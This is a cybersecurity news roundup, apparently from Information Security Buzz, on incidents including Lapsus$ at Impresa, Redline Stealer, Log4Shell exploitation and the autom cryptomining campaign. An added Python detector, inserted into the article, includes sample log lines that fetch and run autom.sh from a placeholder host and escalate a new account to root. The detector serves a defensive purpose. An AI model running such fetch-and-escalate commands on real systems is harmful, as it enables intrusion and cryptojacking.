Due to advancing digitization and the rise of internet technologies, cybersecurity threats have become pervasive. Cybercriminal groups have grown more sophisticated, and many threats to cyber safety are beyond our control. These attacks cause severe damage across sectors: financial losses, regulatory penalties, reputational damage, lawsuits, and business continuity disruptions.
No organization is safe in the present digital world. As intruders increasingly rely on the latest and most sophisticated technologies, organizations feel helpless as their critical assets and confidential data fall prey to these attacks. Moreover, the rapid adoption of advanced technologies, such as Artificial Intelligence, Machine Learning, Cloud Computing, and the Internet of Things, has added new threats for organizations.
In this article, we will look at the recent cyber incidents happening around the globe in the last few days. Let’s get started.
Lapsus$ gang hits SIC
The Lapsus$ ransomware gang has hacked Impresa and is extorting the company. The hack occurred over the New Year’s holiday and hit the company’s online IT infrastructure. As a result, the websites of Expresso, the Impresa group and all the SIC TV channels are offline. Cable TV and airwave broadcasts are operating normally, but the hack has taken down SIC’s online streaming capabilities.
The Lapsus$ group took credit for the hack by defacing all of Impresa’s websites with a ransom note. The message claims that the Lapsus$ group gained access to Impresa’s Amazon Web Services account. Impresa staff regained control over this account when all the websites were put into maintenance mode, but the attackers then tweeted from Expresso’s Twitter account, showing that they still had access to the company’s resources. It is one of the biggest cybersecurity attacks in Portugal’s history.
Persistent malware in hidden SSD area
Korean researchers have devised a set of attacks against Solid State Drives (SSDs), planting malware in areas that are beyond the reach of security solutions and users. The attack model targets a hidden area on the device, called over-provisioning, widely used by SSD manufacturers for performance optimization. Such hardware-level attacks provide a high degree of stealth and persistence.
Research at Korea University explains that an attacker can modify the size of the over-provisioning (OP) area by leveraging the firmware manager, which can generate an exploitable invalid data space. The underlying issue is that many SSD makers choose not to erase invalid data areas, so the space remains filled with data for long periods. Threat actors leveraged this vulnerability to gain access to critically sensitive data.
Redline Stealer Malware targeting autologin feature of browsers
The Redline information-stealing malware abuses the browser autologin feature to steal credentials. On cybercrime forums, this malware is available for $200. It is a commodity information-stealer that can be deployed by beginners with little knowledge against all major browsers, including Chrome, Opera, Firefox, and Microsoft Edge. AhnLab SEC, a cybersecurity firm, has warned that the autologin feature is becoming a common target of cybercriminals, significantly impacting both users and organizations.
Moreover, it also works on systems that have anti-malware installed. According to a report, the malware targets the ‘Login Data’ file present in all Chromium-based browsers, in which users’ usernames and passwords are stored. The Redline stealer collects information from browsers, including login accounts and passwords, cookies, autofill data, credit card information, seed files, crypto wallet information, and more. This malware was first spotted in March 2020 and was later distributed via various channels, such as phishing emails, disguise as editing tools, and abuse of Google ads. Users must follow and configure security rules to stay protected.
RIPTA data breach
Recently a data breach occurred at RIPTA (Rhode Island Public Transit Authority), compromising potentially sensitive information, such as names, addresses, Social Security numbers, Medicare information, birth dates, claims information, and health insurance member identification numbers. The breach was first detected in August, and RIPTA disclosed it on its website on December 21.
In a recent statement, the company said that the incident involved the personal information (PI) of its health plan beneficiaries. The American Civil Liberties Union has received complaints from victims who have no direct connection to RIPTA. The U.S. Department of Health and Human Services has published a report stating that over 5,000 users were affected by this breach.
Log4Shell exploit used to target academic institution
Chinese APT hackers have been observed exploiting the critical Log4Shell vulnerability in Apache’s logging library to perform several post-exploitation operations. Cybersecurity firm CrowdStrike said that the exploitation was aimed at a large academic institution. The intrusion exploited the newly discovered Log4Shell vulnerability to access a vulnerable instance of the VMware Horizon desktop and application virtualization product. This was followed by the execution of a series of malicious commands to fetch payloads hosted on a remote server.
The malicious behavior of the group, tracked as Aquatic Panda, went beyond reconnaissance of the compromised host. It began with an effort to hinder a third-party endpoint detection and response service before retrieving next-stage payloads to obtain a reverse shell and harvest credentials. However, when the target was alerted to the incident, they were unable to implement the incident response protocol immediately.
Autom cryptomining malware attacks
An ongoing cryptomining campaign has evolved its defense evasion tactics, allowing the threat actor to obscure its intrusions. It was first detected in 2019 with 84 attacks against the researchers’ honeypot servers, and 125 further attacks were spotted in the third quarter of 2021. Initial intrusions involved running a malicious command upon executing a vanilla image named “alpine:latest”, which downloaded a shell script named “autom.sh”.
The shell script starts the attack sequence that allows the adversary to create a new account and elevate its privileges to root. The campaign hijacks compromised systems to mine cryptocurrency. Separately, the hacking group TeamTNT has been observed targeting unsecured database servers, exposed Docker APIs, Alibaba Elastic Computing Service instances, and vulnerable Kubernetes clusters to execute malicious code on the targeted hosts and deploy cryptomining payloads.
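As an added defender-side illustration (not code from the article or from the researchers who reported the campaign), the following Python detector correlates the chain described above, a container launched from the vanilla alpine:latest image, a download of autom.sh, creation of a new account and elevation of that account to root, across constructed sample log lines; the log format, host names, the account name and the PLACEHOLDER-HOST URL are all assumptions made for the example.

```python
import re
from collections import defaultdict

# Constructed sample events in an assumed "timestamp host process command"
# format; these are not real logs from the campaign, only an illustration.
SAMPLE_LOG = """\
2021-09-01T10:00:01Z node7 dockerd run --rm alpine:latest sh -c "wget -q -O /tmp/autom.sh http://PLACEHOLDER-HOST/autom.sh; sh /tmp/autom.sh"
2021-09-01T10:00:03Z node7 sh useradd -m newuser
2021-09-01T10:00:04Z node7 sh usermod -o -u 0 -g 0 newuser
2021-09-01T10:05:00Z node9 dockerd run --rm alpine:latest sh -c "apk add --no-cache curl"
2021-09-01T10:06:00Z node9 sh curl -s https://PLACEHOLDER-HOST/healthcheck.sh
"""

# One regex per stage of the chain the article describes, matched on the command.
STAGES = {
    "alpine_image": re.compile(r"\balpine:latest\b"),
    "autom_fetch": re.compile(r"\b(?:wget|curl)\b.*\bautom\.sh\b"),
    "account_create": re.compile(r"\b(?:useradd|adduser)\b"),
    "root_escalation": re.compile(r"\busermod\b.*-u\s*0\b|/etc/sudoers\b"),
}

LINE_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(.*)$")

def parse_events(text):
    """Yield (timestamp, host, process, command) tuples from the log text."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            yield m.groups()

def detect_autom_chain(text, min_stages=3):
    """Return {host: sorted stage names} for hosts showing at least min_stages
    stages of the chain. A lone alpine:latest run (node9) is not enough to
    alert, which keeps ordinary container use from producing noise."""
    seen = defaultdict(set)
    for _ts, host, _proc, cmd in parse_events(text):
        for name, pat in STAGES.items():
            if pat.search(cmd):
                seen[host].add(name)
    return {h: sorted(s) for h, s in seen.items() if len(s) >= min_stages}

if __name__ == "__main__":
    for host, stages in detect_autom_chain(SAMPLE_LOG).items():
        print(f"ALERT {host}: {', '.join(stages)}")
```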
Vulnerabilities in Microsoft Teams
Multiple vulnerabilities in Microsoft Teams have been detected that allow intruders to leak IP addresses, spoof link previews, and access internal services. A team of security researchers discovered four vulnerabilities: server-side request forgery, URL preview spoofing, a denial-of-service flaw, and an IP address leak. The team explained that these could enable cybercriminals to direct users to fraudulent websites, opening the door to a host of malicious activities.
Two of the flaws affect Android users. First, the IP address leak vulnerability exposes the user’s IP address. Second, the denial-of-service vulnerability renders the application’s channels unusable with a specially crafted message. So far, Microsoft has patched only one of these vulnerabilities, the IP address leak on Android. Regarding the spoofing issue, the researchers suggested checking the URL in the address bar after following a link.
Cyberattack on Norwegian media company
Amedia, the largest local news publisher in Norway, announced on Tuesday that many of its central systems had been shut down following a serious cyberattack. The attack prevented the company from printing physical newspapers on Wednesday, and presses will remain halted until the problem is resolved. The attack also impacted the company’s subscription and advertising systems, preventing advertisers from buying new ads and subscribers from making or canceling subscriptions.
The company said that it has not been confirmed whether personal information was compromised. The affected subscription system contains the names, phone numbers, addresses, and subscription histories of users. Data such as reading history, passwords, and financial information is not affected. Amedia publishes more than 90 newspapers and publications, reaching more than 2.5 million Norwegians.
SIM swapping attacks at T-Mobile
SIM swapping attacks have caused a data breach at T-Mobile, exposing potentially sensitive customer information. Unauthorized activity on some customers’ accounts resulted in exposed personal information or SIM swaps. Both can have dreadful consequences for customers: a SIM swap lets criminals take over the SIM card linked with a number and bypass multi-factor authentication on the target’s accounts.
T-Mobile has fallen victim to cyber attacks with worrying regularity over the past few years. In 2018, a data breach impacted 3 percent of the company’s 77 million users. Its IT systems remain vulnerable, and known security issues have still not been resolved. As a result, data of prepaid, postpaid, and prospective customers was stolen.
RSAC postponed due to safety and health concerns
The RSA Conference 2022 has been postponed due to the COVID-19 pandemic. The conference was scheduled for February 2022 but will now take place both digitally and in person from 6-9 June at the Moscone Center in San Francisco. Linda Gray Martin, Vice President of RSA Conference, explained the decision in an email to conference registrants. Attendees who have already registered and plan to attend in June will have their passes automatically validated by the RSA team.
The opinions expressed in this post belong to the individual contributors and do not necessarily reflect the views of Information Security Buzz.